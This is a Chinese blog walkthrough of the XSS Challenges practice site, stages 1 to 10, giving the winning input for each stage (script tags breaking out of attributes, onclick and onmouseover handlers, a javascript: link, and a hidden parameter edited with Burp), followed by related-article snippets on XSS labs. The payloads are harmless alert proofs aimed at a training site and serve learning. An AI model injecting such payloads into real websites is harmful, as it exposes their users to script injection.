XSS Challenges练习方法

最新推荐文章于 2023-07-10 14:11:25 发布
最新推荐文章于 2023-07-10 14:11:25 发布
阅读量176 收藏 3
点赞数 1
分类专栏: 等保测评 网络安全渗透 网络安全 文章标签: javascript xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44950652/article/details/116568861
版权

XSS Challenges练习方法

XSS Challenges练习方法

网站练习地址:https://xss-quiz.int21h.jp/

第一关

  1. 输入 123,查看到渗透点
    在这里插入图片描述
  2. 输入:"</b><script>alert(document.domain);</script>,结果成功
    在这里插入图片描述

第二关

  1. 输入:123
    在这里插入图片描述
  2. 输入:"><script>alert(document.domain);</script>
    在这里插入图片描述

第三关

  1. 输入:123,再输入:</b><script>alert(document.domain);</script>
    在这里插入图片描述
  2. 使用抓包软件,BP,更改P2参数为:<script>alert(document.domain);</script>
    在这里插入图片描述
  3. 成功进行XSS
    在这里插入图片描述

第四关

  1. 抓包看见三个参数,输入一些XSS发现无情况,但发现有三个参数:p1=123&p2=Japan&p3=hackme
    在这里插入图片描述
  2. 找到 p3的参数
    在这里插入图片描述
  3. 发现隐藏的参数P3容易进行XSS,改变p3的参数,输入如下:"><script>alert(document.domain);</script>
    在这里插入图片描述

第五关

  1. 输入:123,发现框框的参数有输入限制,可进行更改,直接更改。
    在这里插入图片描述
  2. 输入:"><script>alert(document.domain);</script>
    在这里插入图片描述

第六关

  1. 输入:"><script>alert(document.domain);</script>,发现被转义了
    在这里插入图片描述

  2. 两种方法
    输入:"onclick="alert(document.domain)
    输入:"onmouseover="alert(document.domain)
    在这里插入图片描述
    在这里插入图片描述

第七关

  1. 输入:test onmouseover=alert(document.domain) 或者 test onclick=alert(document.domain)
    在这里插入图片描述

第八关

  1. 记住一句话,a标签用下面这个,输入:javascript:alert(document.domain)
    在这里插入图片描述

第九关

  1. 这个关卡,其他网友给得意见是使用IE浏览器,对环境有要求,先跳过,后台使用:alert(document.domain);可以直接跳过

在这里插入图片描述

第十关

  1. 输入:" onclick="alert(document.dodomainmain)
    在这里插入图片描述
慕書
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS入门 XSS Challenges靶场搭建/前五关/基础教程
ChenD的学习笔记
10-11 1150
XSSChallenges 前五关,XSS注入点判断
XSS学习笔记:XSS Challenges 1-19通关全详解
闵行小鱼塘
10-07 6017
通过 XSS Challenges 平台学习下XSS,共19关
xss-challenge-tourXSS靶场)1-10
00勇士王子的博客
09-06 880
第一关 第一关是最简单的,什么限制都没有,直接上最普通的xss代码实现弹窗 <script>alert(‘xss’)</script> payload <script>alert('xss')</script> 第二关 直接输入第一关的代码,没有弹窗,F12看一下代码,尝试进行闭合 下面是包含我们之前输入的内容的代码 <input name="keyword" value="<script>alert(/xss/)</scr.
HTTP/HTTPS以及XSS攻击详解。
最新发布
高性价比服务器就选:蓝易云
07-10 251
HTTP(Hypertext Transfer Protocol)是一种用于在Web上传输数据的协议,而HTTPS(Hypertext Transfer Protocol Secure)是在HTTP基础上加入安全层的协议。综上所述,HTTP是一种用于在Web上传输数据的协议,而HTTPS是HTTP的安全版本,通过加密和身份验证确保通信的安全性。防范XSS攻击的方法包括输入验证和过滤、输出编码和转义、使用安全的编程实践(如避免动态生成脚本代码)以及使用内容安全策略(CSP)等。
搭建HTTPS XSS漏洞利用平台
xxx9686的博客
09-26 680
蓝框域名证书紫框root根证书两张证书则需要合并填入面板证书的右边蓝框中(用文本编辑器完整复制粘贴进去)若不合并只填蓝框域名证书手机访问就会报缺失证书链/不安全等。1、修改config.php里面的数据库连接字段,包括用户名,密码,数据库名,访问URL起始和伪静态的设置。蓝框.crt后缀的是证书(也可能是pem后缀),填入面板证书的右边蓝色框中(用文本编辑器完整复制粘贴进去)以下是文本编辑器里的截图,蓝色域名证书放上面的蓝框中紫框root根证书放下面的紫框中(注意完整)
学习网站1
08-08
同时,Firing Range、XSS ChallengesXSS Game提供了更多的训练环境,让你可以通过解决实际问题来增强对XSS防御的理解。 SQL注入则是另一种常见的Web应用漏洞,攻击者通过输入恶意的SQL语句,欺骗服务器执行非预期...
qa-real-challenges:包含指向实际QA挑战练习的链接的存储库
05-27
"qa-real-challenges"这个项目似乎是一个专门为 QA 工程师提供实战训练资源的存储库,它包含了指向实际QA挑战练习的链接,帮助从业者提升技能,更好地应对工作中可能遇到的问题。 尽管描述中提到该仓库已移至其他...
javascript-code-challenges:面向初学者和专家JavaScript现代面试代码挑战集合
02-04
4. `challenges` - 明确这些是用于提升技能的练习题目。 5. `interview-questions` - 表明这些挑战模拟了面试中可能出现的问题。 6. `frontend-framework` - 暗示可能包括使用前端框架(如React、Vue或Angular)的...
oyusec.github.io:https的官方部署页面
03-28
9. **Web安全**: 由于oyusec.github.io涉及到CTF挑战,其中很可能包含了一些关于Web安全的实战练习,如SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等,帮助用户提升网络安全技能。 10. **响应式设计**: 为了...
java-programming-challenges:Java程序员面临的常见编程挑战
05-02
Java编程挑战是每个Java开发者在职业生涯中都会遇到的必经之路。...在这个过程中,可以参考“java-programming-challenges-master”这样的资源,它可能包含了各种挑战性的练习题目,助你巩固和提升技能。
XSS Challenges stage#1-10闯关详解
枫梓林のBlog
04-29 1277
XSS Challenges stage1-10闯关详解 文章目录XSS Challenges stage1-10闯关详解0x01 xss challenges 闯关环境准备1.XSS challenges介绍2.配置burpsuite 加载证书用于截断 HTTPS协议0x02 手动挖掘XSS漏洞 Stage # 1-10 关1.stage #1 无过滤的XSS注入1.1 使用闭合标签方式进行反射型 XSS 注入2.Stage #2 属性中的 XSS 注入2.1 使用闭合的input标签方式进行注入2.2
XSS-Challenge 闯关7-16
linxaiomo
04-08 3882
第六关: 第七关: 第八关: 第九关: 第十关: 第十一关: 第十一关: 第十二关:利用IE浏览器的过滤特性绕过 第十三关:利用CSS样式结合IE特性绕过 第十四关:内联注释 第十五关:16进制编码绕过 ...
网络安全:XSS、CSRF、点击劫持、HTTPS加密(中间人攻击、DNS劫持)、泛洪攻击、SQL注入
y_xiuzhu的博客
07-31 2531
网络安全介绍及解决方案
XSS练习平台【XSS Challenges
热门推荐
taozijun的博客
07-31 1万+
以下来自XSS练习平台----XSS Challenges 这个练习平台没有像alert(1)to win类似的平台一样会给出关键的源代码,并且会在页面给予反馈。这是一个模仿真实xss挖洞的情景,在XSS Challenges练习过程中,我们需要用浏览器中的f12中搜索(),找出我们控制的代码所在的位置,然后思考那些个位置哪个或哪几个位置可以被注入我们想要的代码,然后结合上下文进行各种脑洞绕过。...
xss challenge accepted靶场 11-20关 详细教程
小明师傅博客
06-10 929
第11关 唯一有变化的就是这个地方 referer会传入参数 我们直接在会改变的元素改 成功 第12关 发现了这条 User-Agent头注入 第13关 cookie注入 15关 发现有个网站,打开发现要科学上网才可以访问 找了好久,之后才发现是被修复了漏洞的网站 在乌云倒是找到了,用上传有xss代码的图片触发 15关 我这里不知道为什么打不开 16关 script,/被过滤了,可以借用img标签的onerror事件,img标签支持onerror 事件,在装载文档或图像的过
[渗透测试笔记] 10.xss训练专题
H4ppyD0g的博客
10-04 1630
找到一套题,看评价这套题还是挺好的,网址在博文题目里。 所有的题目要求都是弹窗1。 0x00 直接让它弹框就好了。 <script>alert('1')</script> ————————————————————————————————————— 0x01 闭合前面的<textarea>就好了。 payload </textarea><scr...
XSS Challenges过关答案
0ffs3t
10-29 3908
http://xss-quiz.int21h.jp 第一关: 第二关:">alert(document.domain); 第三关: http://xss-quiz.int21h.jp/stage-3.php?sid=93de7707279b3a5ae4ce419bfc7c0b1f380a20f6 提示:The input in text box is properly escaped 但是输入点
XSS challenges关卡记录
插销丸的博客
04-14 402
1 "</b><script>alert(document.domain);</script><b>" 2 闭合input "><script>alert(document.domain)</script> 3
前端必须懂的计算机网络知识—(XSS、CSRF和HTTPS)
weixin_33762321的博客
10-02 281
前端必须懂的计算机网络知识系列文章: DNS服务器和跨域问题 计算机网络的分层模型 IP地址和MAC地址 前端必须懂的计算机网络知识—(跨域、代理、本地存储) 前端必须懂的计算机网络知识—(TCP) 前端必须懂的计算机网络知识—(HTTP) 前端必须懂的计算机网络知识—(XSS、CSRF和HTTPS) HTTP为什么不安全 可能被窃听: HTTP 本身不具备加密的功能,HTTP 报文使用...
XSS Challenges Stage #1
04-28
XXSSXSSXSS挑战XSS挑战阶XSS挑战阶段XSS挑战阶段是XSS挑战阶段是一XSS挑战阶段是一种XSS挑战阶段是一种安XSS挑战阶段是一种安全XSS挑战阶段是一种安全测试XSS挑战阶段是一种安全测试方法XSS挑战阶段是一种安全测试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值